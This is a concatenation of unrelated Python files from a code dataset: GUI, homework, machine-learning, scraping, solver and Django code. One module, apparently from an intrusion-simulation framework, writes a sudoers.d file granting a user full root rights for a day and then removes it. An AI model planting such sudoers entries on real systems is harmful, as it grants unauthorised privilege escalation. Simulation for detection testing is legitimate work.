dialog_generate_dissector_script import DialogGenerateDissectorScript\nfrom dialog_import_project import DialogImportProject\nfrom dialog_new_project import DialogNewProject\nfrom dialog_open_pcap import DialogOpenPCAP\nfrom dialog_organize_views import DialogOrganizeViews\nfrom dialog_workspace_launcher import DialogWorkspaceLauncher\n\nclass WindowType():\n WINDOW_FIELD = 0\n WINDOW_START_FIELD = 1\n WINDOW_END_FIELD = 2\n WINDOW_RLIST = 3\n WINDOW_PINFO = 4\n WINDOW_WORKSPACE_LAUNCHER=5\n WINDOW_NEW_PROJECT=6\n WINDOW_DISSECTOR_SCRIPT=7\n WINDOW_PROJECT_IMPORT=8\n WINDOW_PROJECT_EXPORT=9\n WINDOW_ORGANIZE_VIEWS=10\n WINDOW_OPEN_PCAP=11\n\nclass AreaWorkspace(tk.Tk):\n def new_window(self, type):\n if type == WindowType.WINDOW_WORKSPACE_LAUNCHER:\n form = DialogWorkspaceLauncher(None)\n elif type == WindowType.WINDOW_NEW_PROJECT:\n form = DialogNewProject(None)\n elif type == WindowType.WINDOW_DISSECTOR_SCRIPT:\n form = DialogGenerateDissectorScript(None)\n elif type == WindowType.WINDOW_PROJECT_IMPORT:\n form = DialogImportProject(None)\n elif type == WindowType.WINDOW_PROJECT_EXPORT:\n form = DialogExportProject(None)\n elif type == WindowType.WINDOW_ORGANIZE_VIEWS:\n form = DialogOrganizeViews(None)\n elif type == WindowType.WINDOW_OPEN_PCAP:\n form = DialogOpenPCAP(None)\n\n def __init__(self):\n tk.Tk.__init__(self)\n self.title('Protocol Dissector Generator System')\n\n import workspace\n workspace.Workspace.current = workspace.Workspace('Example')\n\n center = tk.Frame(self)\n top = tk.Frame(self)\n left = AreaProjectNavigation(self)\n center.grid(row=1,column=1, sticky='NEWS', padx=0, pady=2)\n top.grid(row=0,column=1, sticky='N', padx=2, pady=2)\n left.grid(row=1,column=0, sticky='NS', padx=1, pady=2)\n\n pcap_path = \"C:\\\\Users\\\\xeroj\\Desktop\\\\Local_Programming\\\\Python-Software-GUI\\\\example\\\\icmp.pcap\"\n lua_path = \"C:\\\\Users\\\\xeroj\\Desktop\\\\Local_Programming\\\\Python-Software-GUI\\\\example\\\\icmp.lua\"\n\n center_top = AreaDissectorBuilder(center)\n center_bottom = tk.Frame(center)\n psa = AreaPacketStream(center_bottom)\n dsa = AreaDissectedStream(center_bottom)\n dsa.get_info(pcap_path,lua_path)\n rda = AreaRawData(center_bottom)\n rda.get_raw(pcap_path)\n ca = AreaConsole(center_bottom)\n\n center_top.grid(column=0,row=0, sticky=\"NS\")\n center_bottom.grid(column=0, row=1, sticky='NS')\n psa.grid(column=0,row=0,sticky='NE')\n dsa.grid(column=1,row=0,sticky='NE')\n rda.grid(column=2,row=0,sticky='NE')\n ca.grid(column=3,row=0,sticky='NE')\n\n button_createProject = tk.Button(top, text='Create Project', command=lambda:self.new_window(WindowType.WINDOW_NEW_PROJECT))\n button_saveProject = tk.Button(top, text='Save Project')\n button_closeProject = tk.Button(top, text='Close Project', command=lambda:self.quit())\n button_switchWorkspace = tk.Button(top, text='Switch Workspace', command=lambda:self.new_window(WindowType.WINDOW_WORKSPACE_LAUNCHER))\n button_importProject = tk.Button(top, text='Import Project', command=lambda:self.new_window(WindowType.WINDOW_PROJECT_IMPORT))\n button_exportProject = tk.Button(top, text='Export Project', command=lambda:self.new_window(WindowType.WINDOW_PROJECT_EXPORT))\n button_generateDissectorS = tk.Button(top, text='Generate Dissector Script', command=lambda:self.new_window(WindowType.WINDOW_DISSECTOR_SCRIPT))\n button_organizeViews = tk.Button(top, text='Organize Views', command=lambda:self.new_window(WindowType.WINDOW_ORGANIZE_VIEWS))\n button_openPCAP = tk.Button(top, text='Open PCAP', command=lambda:self.new_window(WindowType.WINDOW_OPEN_PCAP))\n\n # place the buttons in the top frame\n button_createProject.grid(row=0, column=0, padx=5, pady=2)\n button_saveProject.grid(row=0, column=1, padx=5, pady=2)\n button_closeProject.grid(row=0, column=2, padx=5, pady=2)\n button_switchWorkspace.grid(row=0, column=3, padx=5, pady=2)\n button_importProject.grid(row=0, column=4, padx=5, pady=2)\n button_exportProject.grid(row=0, column=5, padx=5, pady=2)\n button_generateDissectorS.grid(row=0, column=6, padx=5, pady=2)\n button_organizeViews.grid(row=0, column=7, padx=5, pady=2)\n button_openPCAP.grid(row=0, column=8, padx=5, pady=2)","sub_path":"area_workspace.py","file_name":"area_workspace.py","file_ext":"py","file_size_in_byte":4906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"268548117","text":"'''\r\n2) Escreva um algoritmo para ler as dimensões de um retângulo (base e altura),\r\ncalcular e escrever a área do retângulo, e caso seja um quadrado, exibir a frase: área de um quadrado\r\n'''\r\n\r\nbase = int(input(\"base\"))\r\naltura = int(input(\"altura\"))\r\n\r\narea = base*altura\r\n\r\nprint(\"a área é 5\" + str(area))\r\n\r\nif base == altura:\r\n print(\"área de um quadrado\")\r\n","sub_path":"dimensoes-retangulo.py","file_name":"dimensoes-retangulo.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"173839950","text":"'''\nPut the data(from the database) to the task queue.\n'''\nimport get_submit_to_judge\nimport change_status\nimport time\nimport config\nimport db_connect\nfrom datetime import datetime\nimport MySQLdb\n\n \ndef traversal_database(task_queue, db_lock):\n '''\n traversal the database every 1 seconds, if there are some tasks didn't\n be judged, these process will be blocked.\n '''\n while True:\n # until all the tasks were processed.\n task_queue.join()\n with db_lock:\n # connect to the database.\n db = db_connect.db_connect()\n # use the Lock when connecting to the database\n data_for_judge = get_submit_to_judge.get_submit_to_judge(db)\n if data_for_judge is not None:\n for submit_id, problem_id, lang, code_path, judge_status, time_limits, memory_limits in data_for_judge:\n item_dict = {\n 'submit_id': submit_id,\n 'problem_id': problem_id,\n 'lang': lang,\n 'code_path': code_path,\n 'judge_status': judge_status,\n 'time_limits': int(time_limits), # MS\n 'memory_limits': int(memory_limits) # KB\n }\n # put the data to the task queue(process safety).\n task_queue.put(item_dict)\n # update the submit status to Queuing\n change_status.change_status(item_dict, db, 12)\n # close the connection\n db.close() \n # sleep 1 seconds.\n time.sleep(1)\n\nif __name__ == '__main__':\n from multiprocessing import Lock\n from queue import Queue\n db_lock = Lock()\n task_queue = Queue()\n traversal_database(task_queue, db_lock)\n","sub_path":"get_task.py","file_name":"get_task.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"422586969","text":"try:\n from framework.main import ModuleBase\nexcept ImportError:\n pass\n\nclass UserAddSudoers(ModuleBase):\n \"\"\" creates a sudoers.d file for the user \"\"\"\n @property\n def tags(self):\n return ['IntrusionSet4']\n\n @property\n def needs_root(self):\n return True\n\n @property\n def relative_delay(self):\n return 80\n\n @property\n def absolute_duration(self):\n return 24 * 60 * 60 # 1 day\n\n def do_run(self):\n import os, stat, time\n username = '${USER_NAME}'\n fname = '/etc/sudoers.d/${SUDOERS_FNAME}~'\n try:\n if not os.path.exists('/etc/sudoers.d'):\n os.mkdir('/etc/sudoers.d', mode=0o755)\n if not os.path.exists('/etc/sudoers.d') or not os.path.isdir('/etc/sudoers.d'):\n self.hec_logger('Error: /etc/sudoers.d directory does not exist!', severity='error')\n return\n with open(fname, 'w+') as f:\n f.write('{0} ALL=(ALL:ALL) ALL'.format(username))\n os.chmod(fname, stat.S_IRUSR | stat.S_IRGRP)\n self.hec_logger('Created a sudoers.d file', username=username, fname=fname)\n except Exception as e:\n self.hec_logger(str(e), severity='error')\n return\n time.sleep(self.absolute_duration)\n try:\n os.unlink(fname)\n self.hec_logger('Removed sudoers.d file', username=username, fname=fname)\n except Exception as e:\n self.hec_logger(str(e), severity='error')\n\n def run(self):\n self.start()\n try:\n self.do_run()\n except Exception as e:\n self.hec_logger('Uncaught exception within module, exiting module gracefully', error=str(e),\n severity='error')\n self.finish()\n","sub_path":"framework/modules/sudoerfile.py","file_name":"sudoerfile.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"415172837","text":"# Prepare data for execution\n# Author: Trinh Man Hoang - 14520320\n# Last Updated: 4/10/2017\n\n\nfrom sklearn.datasets import fetch_lfw_people\nfrom skimage.feature import local_binary_pattern\nimport numpy as np\n\n\n# Extract LBP features and save in data.npy\ndef save():\n lfw_people = fetch_lfw_people(min_faces_per_person=70, resize=0.4)\n X = np.array([]).reshape(0,1850)\n for image in lfw_people.images:\n lbt_image = local_binary_pattern(image,P=8,R=0.5).flatten()\n X = np.append(X,[lbt_image],axis=0)\n np.save(file='data.npy',arr=X)\n\n# Just uncomment & run the line below 1 time\n#save()\n\n\n# Load features matrix\ndef load():\n return np.load('data.npy')","sub_path":"ThucHanh_1/BaiTap_3/PreparedData.py","file_name":"PreparedData.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"136895740","text":"import selenium\nfrom selenium import webdriver\nimport calculate\nimport graphic\n\n# Will scap yahoo finance\n\n\nclass tickerScrapper:\n driver = webdriver.Chrome(executable_path=\".//chromedriver\")\n\n def __convertArrayToFloat(self, srcArray):\n i = 0\n while i < len(srcArray):\n srcArray[i] = float(srcArray[i].replace(',', '')) / 10000\n i += 1\n\n def __scrapDates(self):\n dates = self.driver.find_element_by_css_selector(\n \"#Col1-1-Financials-Proxy > section > div:nth-of-type(4) > div > div:nth-of-type(1) > div:nth-of-type(1)\").text\n dates = dates[13:]\n dates = [(dates[i:i + 10]) for i in range(0, len(dates), 10)]\n dates.insert(0, 'TTM')\n dates = dates[::-1]\n return dates\n\n def __scrapRow(self, rows, index):\n res = rows.find_element_by_css_selector(\n f\"div:nth-of-type({index})\").text.split('\\n')\n res = res[1].split(' ')\n self.convertArrayToFloat(res)\n res = res[::-1]\n return res\n\n # Parse the html to get date, income, revenue and call Calculate class\n # to get growth and profit margin\n def __parser(self):\n try:\n rows = self.driver.find_element_by_css_selector(\n \"#Col1-1-Financials-Proxy > section > div:nth-of-type(4) > div > div:nth-of-type(1) > div:nth-of-type(2)\")\n dates = self.scrapDates()\n revenue = self.scrapRow(rows, 1)\n income = self.scrapRow(rows, 11)\n calc = calculate.Calculate()\n growth = calc.yearToYearGrowth(revenue)\n profitMargin = calc.profitMargin(revenue, income)\n except Exception as identifier:\n print(f\"Error: {str(identifier)}\")\n exit()\n plot = graphic.Graphic()\n plot.drawPlot(dates, growth, profitMargin)\n\n # Check if the ticker exist, if yes, call parser method\n def tickersExist(self, ticker):\n try:\n self.driver.get(\n \"https://finance.yahoo.com/quote/\" + ticker + \"/financials\")\n if \"quote\" not in self.driver.current_url:\n print(f\"Tickers {ticker} does not exist\")\n exit()\n except Exception as e:\n print(\"Request have failed: \" + str(e))\n exit()\n self.parser()\n","sub_path":"ticketScrapper.py","file_name":"ticketScrapper.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"341798003","text":"import imdb_data\nimport math\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import rnn, rnn_cell\nfrom tensorflow.python.ops import array_ops\nfrom tensorflow.python.ops.math_ops import tanh\n\n\n# Load the training data\n\nX_train,X_validation,y_train,y_validation = imdb_data.load_imdb_data()\nnum_train = len(X_train)\nnum_validation = len(X_validation)\nprint(num_train)\nprint(num_validation)\n\n\n\n# Network Parameters\nlearning_rate = 0.001\nlearning_rate_decay = 0.70\nlearning_rate_min = 0.0001\ntraining_iters = 500000\nbatch_size = 100\ndisplay_step = 500\ndecay_step = 250\n\nn_input = 200\nn_steps = 200\nn_hidden = 100\nn_classes = 2\n\n\n\n# tf Graph input\nx = tf.placeholder(\"float\", [None, n_steps, n_input])\ny = tf.placeholder(\"float\", [None, n_classes])\n\n\n# Define weights\nweights = {\n 'out': tf.Variable(tf.random_normal([2*n_hidden, n_classes]))\n}\nbiases = {\n 'out': tf.Variable(tf.random_normal([n_classes]))\n}\n\nwith tf.variable_scope(\"attention_w\"):\n W_h = tf.get_variable(\"att_w_1\",[n_hidden, n_hidden])\n w = tf.get_variable(\"att_w_2\",[n_hidden, 1])\n W_p = tf.get_variable(\"att_w_3\",[1])\n W_x = tf.get_variable(\"att_w_4\",[1])\n\nwith tf.variable_scope(\"attention_w_2\"):\n W_h_2 = tf.get_variable(\"att_w_1_2\",[n_hidden, n_hidden])\n w_2 = tf.get_variable(\"att_w_2_2\",[n_hidden, 1])\n W_p_2 = tf.get_variable(\"att_w_3_2\",[1])\n W_x_2 = tf.get_variable(\"att_w_4_2\",[1])\n\n# Construct network\ndef RNN(x, weights, biases):\n x = tf.transpose(x, [1, 0, 2])\n x = tf.reshape(x, [-1, n_input])\n x = tf.split(0, n_steps, x)\n gru_fw_cell = rnn_cell.GRUCell(n_hidden)\n gru_fw_cell = tf.nn.rnn_cell.DropoutWrapper(gru_fw_cell, output_keep_prob=0.7)\n gru_bw_cell = rnn_cell.GRUCell(n_hidden)\n gru_bw_cell = tf.nn.rnn_cell.DropoutWrapper(gru_bw_cell, output_keep_prob=0.7)\n outputs, outputs_fw, outputs_bw = rnn.bidirectional_rnn(gru_fw_cell, gru_bw_cell, x,dtype=tf.float32) # Nlist * batch * 2hidden\n\n batch_s = 100\n outputs_all = tf.concat(0,outputs) # (N*batch) * (2*n_hidden)\n outputs_fw_all = outputs_all[:,0:n_hidden] # (N*batch) * n_hidden\n outputs_bw_all = outputs_all[:,n_hidden:2*n_hidden] # (N*batch) * n_hidden\n\n # dropout\n outputs_fw_all = tf.nn.dropout(outputs_fw_all, keep_prob=0.5)\n outputs_bw_all = tf.nn.dropout(outputs_bw_all, keep_prob=0.5)\n\n M_fw = tanh(tf.matmul(outputs_fw_all,W_h)) # (N*batch) * 2*hidden\n M_bw = tanh(tf.matmul(outputs_fw_all,W_h_2)) # (N*batch) * 2*hidden\n\n # dropout\n M_fw = tf.nn.dropout(M_fw, keep_prob=0.5)\n M_bw = tf.nn.dropout(M_bw, keep_prob=0.5)\n\n a_fw = tf.matmul(M_fw,w)\n #a = tanh(tf.matmul(outputs_fw_all,w))\n a_fw = tf.reshape(a_fw, [n_steps,-1]) # N*batch\n a_fw = tf.transpose(a_fw, [1,0]) # batch*N\n a_fw = tf.nn.softmax(a_fw)\n a_fw = tf.reshape(a_fw, [batch_s,1,n_steps]) # batch*1*N\n\n\n a_bw = tf.matmul(M_bw,w_2)\n #a = tanh(tf.matmul(outputs_bw_all,w_2))\n a_bw = tf.reshape(a_bw, [n_steps,-1]) # N*batch\n a_bw = tf.transpose(a_bw, [1,0]) # batch*N\n a_bw = tf.nn.softmax(a_bw)\n a_bw = tf.reshape(a_bw, [batch_s,1,n_steps]) # batch*1*N\n\n #-------------------------------------------------------------------------------------\n\n outputs_fw_all = tf.reshape(outputs_fw_all, [n_steps,-1, n_hidden]) # N*batch*d\n outputs_fw_all = tf.transpose(outputs_fw_all, [1,0,2]) # batch*N*d\n outputs_bw_all = tf.reshape(outputs_bw_all, [n_steps,-1, n_hidden]) # N*batch*d\n outputs_bw_all = tf.transpose(outputs_bw_all, [1,0,2]) # batch*N*d\n\n a_fw = tf.split(0, batch_s, a_fw)\n outputs_fw_all = tf.split(0, batch_s, outputs_fw_all)\n a_bw = tf.split(0, batch_s, a_bw)\n outputs_bw_all = tf.split(0, batch_s, outputs_bw_all)\n\n r_fw = []\n r_bw = []\n for i in range(batch_s):\n a_fw_2 = a_fw[i][0:1,:,:]\n o_fw_2 = outputs_fw_all[i][0:1,:,:]\n att_fw = tf.reshape(a_fw_2,[1, n_steps]) # 1*N\n out_fw = tf.reshape(o_fw_2,[n_steps,n_hidden]) # N*2*n_hidden\n\n a_bw_2 = a_bw[i][0:1,:,:]\n o_bw_2 = outputs_bw_all[i][0:1,:,:]\n att_bw = tf.reshape(a_bw_2,[1, n_steps]) # 1*N\n out_bw = tf.reshape(o_bw_2,[n_steps,n_hidden]) # N*2*n_hidden\n\n # dropout\n #att = tf.nn.dropout(att, keep_prob=0.5)\n #out = tf.nn.dropout(out, keep_prob=0.5)\n\n r_fw.append(tf.matmul(att_fw,out_fw))\n r_bw.append(tf.matmul(att_bw,out_bw))\n r_fw = tf.concat(0,r_fw) # batch*d\n r_bw = tf.concat(0,r_bw) # batch*d\n #_h = tanh(W_p*r_fw + W_p_2*r_bw + W_x*outputs[-1])\n _h_1 = W_p*r_fw + W_x*outputs_fw\n _h_2 = W_p_2*r_bw + W_x_2*outputs_bw\n _h = tf.concat(1,[_h_1,_h_2])\n\n # dropout\n _h = tf.nn.dropout(_h, keep_prob=0.25)\n\n predict = tf.matmul(_h, weights['out']) + biases['out']\n return predict,outputs\n\npred,outputs_2 = RNN(x, weights, biases)\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\ncorrect_pred = tf.equal(tf.argmax(pred,1), tf.argmax(y,1))\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\nvalidation_accuracy = tf.placeholder(\"float\")\ntf.scalar_summary('validation_accuracy', validation_accuracy)\ntrain_accuracy = tf.placeholder(\"float\")\ntf.scalar_summary('train_accuracy', train_accuracy)\ntrain_loss = tf.placeholder(\"float\")\ntf.scalar_summary('train_loss', train_loss)\n\n\ninit = tf.initialize_all_variables()\n\nwith tf.Session() as sess:\n merged = tf.merge_all_summaries()\n writer = tf.train.SummaryWriter('tensorboard/att_mul_dropout/att/no_dropout', sess.graph)\n sess.run(init)\n step = 0\n step_all = 0\n # train\n while step_all * batch_size <= training_iters:\n index_start = step*batch_size\n index_end = index_start+batch_size\n batch_x = X_train[index_start:index_end]\n batch_y = y_train[index_start:index_end]\n\n '''\n print(sess.run(outputs_2[50][0:1,0:200], feed_dict={x: batch_x, y: batch_y}))\n print(sess.run(_h[0:1,0:200], feed_dict={x: batch_x, y: batch_y}))\n exit()\n '''\n\n sess.run(optimizer, feed_dict={x: batch_x, y: batch_y})\n\n # display_step\n if step_all % display_step == 0:\n # validation\n acc_validation_all = 0\n step_v = 0\n for validation_step in range(int(num_validation//batch_size)):\n index_start_v = validation_step*batch_size\n index_end_v = index_start_v+batch_size\n acc_v = sess.run(accuracy,feed_dict={x:X_validation[index_start_v:index_end_v],y: y_validation[index_start_v:index_end_v]})\n acc_validation_all += acc_v\n step_v += 1\n accuracy_validation = acc_validation_all/step_v\n # train\n acc_train_batch = sess.run(accuracy, feed_dict={x: batch_x, y: batch_y})\n loss_train_batch = sess.run(cost, feed_dict={x: batch_x, y: batch_y})\n # summary\n result = sess.run(merged,feed_dict={\n x: batch_x, \n y: batch_y,\n validation_accuracy: accuracy_validation,\n train_accuracy: acc_train_batch,\n train_loss: loss_train_batch})\n writer.add_summary(result, step_all)\n print(\"Validation accuracy = %.5f\" % (accuracy_validation))\n print(\"Iter \" + str(step_all*batch_size) + \", Minibatch Loss= \" + \\\n \"{:.6f}\".format(loss_train_batch) + \", Training Accuracy= \" + \\\n \"{:.5f}\".format(acc_train_batch) + \", Learning rate = \" + \\\n \"{:.10f}\".format(learning_rate))\n\n # learning rate\n if (step_all % decay_step == 0 and step_all != 0):\n learning_rate = learning_rate * learning_rate_decay\n if learning_rate < learning_rate_min:\n learning_rate = learning_rate_min\n\n # change steps\n step += 1\n step_all += 1\n if step == int(math.floor(len(X_train)/batch_size)):\n step = 0\n print(\"Optimization Finished!\")\n\n\n","sub_path":"experiment_imdb/imdb_bigru_attention_3.py","file_name":"imdb_bigru_attention_3.py","file_ext":"py","file_size_in_byte":8299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"104428452","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2018/12/02 16:28\n@author: Sucre\n@email: qian.dong.2018@gmail.com\n\"\"\"\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def addTwoNumbers(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n l1 = self.get_number(l1)\n l2 = self.get_number(l2)\n output = self.get_list(l1 + l2)\n return output\n\n def get_number(self, linked_list):\n value = 0\n cnt = 0\n while not linked_list is None:\n value += linked_list.val * (10 ** cnt)\n linked_list = linked_list.next\n cnt += 1\n return value\n\n def get_list(self, value):\n value = str(value)\n value = value[::-1]\n head = ListNode(int(value[0]))\n cur = head\n for i, num in enumerate(value[1:]):\n cur.next = ListNode(int(num))\n cur = cur.next\n return head\n\n\nif __name__ == \"__main__\":\n s = Solution()\n head0 = s.get_list(0)\n head1 = s.get_list(0)\n output = s.addTwoNumbers(head0, head1)\n print(output.next)\n v = s.get_number(output)\n print(v)\n","sub_path":"_002_add_two_numbers.py","file_name":"_002_add_two_numbers.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"535035718","text":"import ctypes as ct\nimport numpy as np\n\nimport sharpy.utils.algebra as algebra\nimport sharpy.aero.utils.uvlmlib as uvlmlib\nimport sharpy.utils.settings as settings\nfrom sharpy.utils.solver_interface import solver, BaseSolver\nimport sharpy.utils.generator_interface as gen_interface\nimport sharpy.utils.cout_utils as cout\n\n\n@solver\nclass StepUvlm(BaseSolver):\n solver_id = 'StepUvlm'\n\n def __init__(self):\n # settings list\n self.settings_types = dict()\n self.settings_default = dict()\n\n self.settings_types['print_info'] = 'bool'\n self.settings_default['print_info'] = True\n\n self.settings_types['num_cores'] = 'int'\n self.settings_default['num_cores'] = 0\n\n self.settings_types['n_time_steps'] = 'int'\n self.settings_default['n_time_steps'] = 100\n\n self.settings_types['convection_scheme'] = 'int'\n self.settings_default['convection_scheme'] = 3\n\n self.settings_types['dt'] = 'float'\n self.settings_default['dt'] = 0.1\n\n self.settings_types['iterative_solver'] = 'bool'\n self.settings_default['iterative_solver'] = False\n\n self.settings_types['iterative_tol'] = 'float'\n self.settings_default['iterative_tol'] = 1e-4\n\n self.settings_types['iterative_precond'] = 'bool'\n self.settings_default['iterative_precond'] = False\n\n self.settings_types['velocity_field_generator'] = 'str'\n self.settings_default['velocity_field_generator'] = 'SteadyVelocityField'\n\n self.settings_types['velocity_field_input'] = 'dict'\n self.settings_default['velocity_field_input'] = {}\n\n self.settings_types['rho'] = 'float'\n self.settings_default['rho'] = 1.225\n\n self.data = None\n self.settings = None\n self.velocity_generator = None\n\n def initialise(self, data, custom_settings=None):\n self.data = data\n if custom_settings is None:\n self.settings = data.settings[self.solver_id]\n else:\n self.settings = custom_settings\n settings.to_custom_types(self.settings, self.settings_types, self.settings_default)\n\n self.data.structure.add_unsteady_information(self.data.structure.dyn_dict, self.settings['n_time_steps'].value)\n\n # init velocity generator\n velocity_generator_type = gen_interface.generator_from_string(\n self.settings['velocity_field_generator'])\n self.velocity_generator = velocity_generator_type()\n self.velocity_generator.initialise(self.settings['velocity_field_input'])\n\n def run(self,\n aero_tstep=None,\n structure_tstep=None,\n convect_wake=True,\n dt=None,\n t=None):\n\n if aero_tstep is None:\n aero_tstep = self.data.aero.timestep_info[-1]\n if structure_tstep is None:\n structure_tstep = self.data.structure.timestep_info[-1]\n if dt is None:\n dt = self.settings['dt'].value\n if t is None:\n t = self.data.ts*dt\n\n # generate uext\n self.velocity_generator.generate({'zeta': aero_tstep.zeta,\n 'override': True,\n 't': t,\n 'ts': self.data.ts,\n 'dt': dt,\n 'for_pos': structure_tstep.for_pos},\n aero_tstep.u_ext)\n if self.settings['convection_scheme'].value > 1 and convect_wake:\n # generate uext_star\n self.velocity_generator.generate({'zeta': aero_tstep.zeta_star,\n 'override': True,\n 'ts': self.data.ts,\n 'dt': dt,\n 't': t,\n 'for_pos': structure_tstep.for_pos},\n aero_tstep.u_ext_star)\n\n # previous_ts = max(len(self.data.aero.timestep_info) - 1, 0) - 1\n # previous_ts = -1\n # print('previous_step max circulation: %f' % previous_aero_tstep.gamma[0].min())\n # print('current step max circulation: %f' % aero_tstep.gamma[0].min())\n uvlmlib.uvlm_solver(self.data.ts,\n aero_tstep,\n structure_tstep,\n self.settings,\n convect_wake=convect_wake,\n dt=dt)\n # print('current step max unsforce: %f' % aero_tstep.dynamic_forces[0].max())\n\n # calculate unsteady (added mass) forces:\n self.data.aero.compute_gamma_dot(dt, aero_tstep, self.data.aero.timestep_info[-3:-1])\n uvlmlib.uvlm_calculate_unsteady_forces(aero_tstep,\n structure_tstep,\n self.settings,\n convect_wake=convect_wake,\n dt=dt)\n return self.data\n\n def add_step(self):\n self.data.aero.add_timestep()\n\n def update_grid(self, beam):\n self.data.aero.generate_zeta(beam, self.data.aero.aero_settings, -1, beam_ts=-1)\n\n def update_custom_grid(self, structure_tstep, aero_tstep):\n self.data.aero.generate_zeta_timestep_info(structure_tstep, aero_tstep, self.data.structure, self.data.aero.aero_settings)\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"sharpy/solvers/stepuvlm.py","file_name":"stepuvlm.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"215327688","text":"import csv\n\ninput_data = open('C://Users//DELL//Desktop//Web-scrapping_Prediction-modeling-master//Data.csv', 'r')\noutput_data = open('C://Users//DELL//Desktop//Web-scrapping_Prediction-modeling-master//Mining2.csv', 'w')\n\nData = csv.reader(input_data, delimiter=',')\n\noutput_data.write(\"Brand, Processor, RAM, OS , Display, Touch, Price \\n\" )\narr = [\"Brand\", \"Processor\", \"RAM\", \"OS\" , \"Display\", \"Touch\", \"Price\"]\n\nflag = 0\nfor row in Data:\n if flag == 0:\n flag = 1\n continue\n count = 0\n for column in row:\n if count == 0 or count == 2 :\n Brand = column.split(\" \")[0]\n output_data.write(Brand + \",\")\n elif count == 1 or count ==3 :\n Processer = column.split(\" \")\n print (Processer)\n Processer = Processer[0] + Processer[1] + Processer[2]\n output_data.write(Processer + \",\") \n elif count == 4:\n Display = column.split(\" \")[0]\n output_data.write(Display + \",\") \n if \"Touchscreen\" in column:\n output_data.write(\"1,\")\n else:\n output_data.write(\"0,\")\n else:\n output_data.write(column)\n count += 1\n \n output_data.write(\"\\n\")\n \ninput_data.close()\noutput_data.close()","sub_path":"Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"332166388","text":"# -*- coding: utf-8 -*-\nfrom django.http import HttpResponse\nfrom django.core.servers.basehttp import FileWrapper\nimport os\nfrom video.models import BannerVideo,HotVideo,VideoType,Course,Video,TopVideo\nfrom video.serializers import VideoSerializer\nfrom django.http import Http404\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nclass VideoIndex(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n def get(self, request, format=None):\n banner=BannerVideo.objects.last()\n if banner:\n banner=banner.video.values('id','img','title','isVip')\n hotvideo=HotVideo.objects.last()\n if hotvideo:\n hotvideo=hotvideo.video.values('id','img','title','isVip')\n typevideo=VideoType.objects.values('id','img','name','style')\n data={'success':True,'banner':banner,'hotvideo':hotvideo,'type':typevideo}\n return Response(data)\n \nclass TypeVideo(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n def get_object(self, pk):\n try:\n return VideoType.objects.get(pk=pk)\n except VideoType.DoesNotExist:\n raise Http404\n def get(self,request,pk,format=None):\n videotype=self.get_object(pk)\n course=videotype.course_set.values('id','title','img','isVip')\n data={'success':True,'course':course,'type':1}\n return Response(data)\n \nclass NormalVideo(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n def get_object(self, pk):\n try:\n return VideoType.objects.get(pk=pk)\n except VideoType.DoesNotExist:\n raise Http404\n def get(self,request,vtype,pk,page,format=None):\n page=int(page)\n if page==0:\n page=1\n start=(page-1)*10\n end=start+10\n videotype=self.get_object(pk)\n videos=videotype.video_set.order_by('-isTop','-isVip',)[start:end].values('id','title','img','desc','isVip','isTop')\n data={'success':True,'videos':videos,'type':vtype}\n return Response(data)\nclass CourseDetail(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n def get_object(self,pk):\n try:\n return Course.objects.get(pk=pk)\n except Course.DoesNotExist:\n raise Http404\n def get(self,request,pk,format=None):\n course=self.get_object(pk)\n videolist=course.video_set.order_by('-isTop','-isVip').values('id','title','img','desc','isVip','isTop')\n data={'success':True,'videos':videolist}\n return Response(data)\nclass VideoDetail(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n def get_object(self,pk):\n try:\n return Video.objects.get(pk=pk)\n except Video.DoesNotExist:\n raise Http404\n def get(self,request,pk,format=None):\n video=self.get_object(pk)\n serializer = VideoSerializer(video)\n data={'success':True,'video':serializer.data}\n return Response(data)\nclass VideoSearch(APIView):\n authentication_classes = (SessionAuthentication, BasicAuthentication)\n permission_classes = (IsAuthenticated,)\n def get(self,request,format=None):\n name=request.GET.get('name','')\n name=name.strip()\n if name:\n 